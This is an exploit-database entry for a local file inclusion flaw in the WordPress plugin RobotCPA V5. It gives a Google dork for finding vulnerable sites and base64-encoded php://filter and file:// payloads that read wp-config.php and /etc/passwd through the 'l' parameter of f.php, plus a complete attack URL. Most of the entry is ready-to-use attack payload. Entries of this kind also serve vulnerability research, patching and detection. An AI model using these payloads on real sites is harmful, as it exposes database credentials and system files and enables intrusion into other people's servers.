[] NeoSense
E X P L O I T S
title author type platform port cve id

WordPress Plugin RobotCPA V5 - Local File Inclusion

Author: T3N38R15
type: webapps
platform: php
port: 80.0
date_added: 2015-06-10 
date_updated: 2015-06-10 
verified: 0 
codes: OSVDB-123181 
tags: WordPress Plugin
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include
# Google Dork: inurl:"/wp-content/plugins/robotcpa/"
# Date: 09.06.2015
# Exploit Author: T3N38R15
# Vendor Homepage: http://robot-cpa.good-info.co/
# Version: 5V
# Tested on: Windows (Firefox)
                   Linux      (Firefox)
The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion.
We just need to base64 encode our injection.
Like that :
php://filter/resource=./../../../wp-config.php
cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==
or
file:///etc/passwd
ZmlsZTovLy9ldGMvcGFzc3dk

our injection look then like that :
http://domain.com/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
and we can see the content of the passwd file.

greets to Black Sniper
Regards T3N38R15
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.